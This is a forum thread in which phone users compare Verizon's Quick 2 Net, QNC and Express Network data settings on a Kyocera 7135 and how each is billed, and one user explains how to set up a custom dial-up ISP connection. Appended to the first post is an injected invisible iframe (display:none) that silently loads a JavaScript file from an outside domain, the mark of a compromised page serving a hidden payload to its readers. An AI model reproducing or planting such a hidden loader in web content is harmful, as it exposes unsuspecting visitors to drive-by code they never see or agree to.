+ Reply to Thread

Thread: Quick2net?

Quick2net?

Am I right that there is no difference between using "quick2net", "qnc" and "Verizon"? I'm pretty sure that all three are 14.4 connections and all are only charged as minutes used (free on nights and weekends). Am I right? Is there any difference between any of these three network settings? I did a search and couldn't find any information.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

QNC

It's my understanding that 'Quick 2 Net' uses standard minutes(Either monthly bundled or Unlimited night and weekend minutes).
    I don't have express network.

I didnt order Express Network either But in my Network settings my phone only has two options:

Express Network (1xRTT)
    VZW Quick 2 Net (14.4 kbps)

When I switch to EN I get a popup message:

You are about to establish an Express Network (1xRTT) connection. Charges apply in accordance with your subscription to the Verizon Wireless' Express Network.

When I switch to QNC (VZW Quick 2 Net) i get:

Quick 2 Net and Dial Up connectins may be charged differently than Express Network sessions. Please check your Calling Plan for details.

I didn't ask for EN so I will have to test it to see if it works and if it does then I gotta call to find out what they are charging me for it!
    iPhone therefore iAm.

Originally posted by Steve
    my phone

My phone. I bet that feels nice to finally say, huh Steve?

It sounds like the Verizon branded phones have different network setting than what the AllTel phones have. I've only got QNC and 1x, no "Verizon" or "Quick2Net".
    Sorry, but I no longer make 7135 headset adapters.

Originally posted by Steve
    [B]When I switch to EN I get a popup message:
    [b]
    You are about to establish an Express Network (1xRTT) connection. Charges apply in accordance with your subscription to the Verizon Wireless' Express Network.
    I got the same message, but unfortunately when you try to connect it won't work. I use the quick2net, which is the same as qnc and verizon. BTW-I did have the "verizon" option on my Alltel 7135, I just didn't have the Express Network or quick2net options.

Originally posted by coolcat
    My phone. I bet that feels nice to finally say, huh Steve?

It sounds like the Verizon branded phones have different network setting than what the AllTel phones have. I've only got QNC and 1x, no "Verizon" or "Quick2Net".

YES IT DOES -- I have been waiting FOREVER to replace my old crappy IIIxe & I have been missing COLOR since I gave my IIIC to my GF for X-mas!!! The 7135 is what I have been dreaming about since I heard of the 6035.....ITS PERFECT!

Yeah verizon has their claws into things-- I still can't seem to figureout how to create my own dialup setting for my work ISP-- I just have those two options. The Quick2Net works, as it should, but I don't have EN on my plan so I expected that It would fail.
    iPhone therefore iAm.

Hi Steve, I'm wondering if I'm understanding the question correctly. Are you trying to create a new Service in the Network Prefs screen? And if so, does it work to pull down the menu (the first, Service), choose New, give it a name, username, phone number, choose the Wireless Modem connection type, etc., and then connect to it? I have the VZW software, and have been connecting to my ISP's dial-up.

Originally posted by turboCat
    Hi Steve, I'm wondering if I'm understanding the question correctly. Are you trying to create a new Service in the Network Prefs screen? And if so, does it work to pull down the menu (the first, Service), choose New, give it a name, username, phone number, choose the Wireless Modem connection type, etc., and then connect to it? I have the VZW software, and have been connecting to my ISP's dial-up.
    Yes it does -- Thanks, I figured it out this morning but I forgot to tell you guys Thanks anyways -- Those are the exact steps I did as well
    iPhone therefore iAm.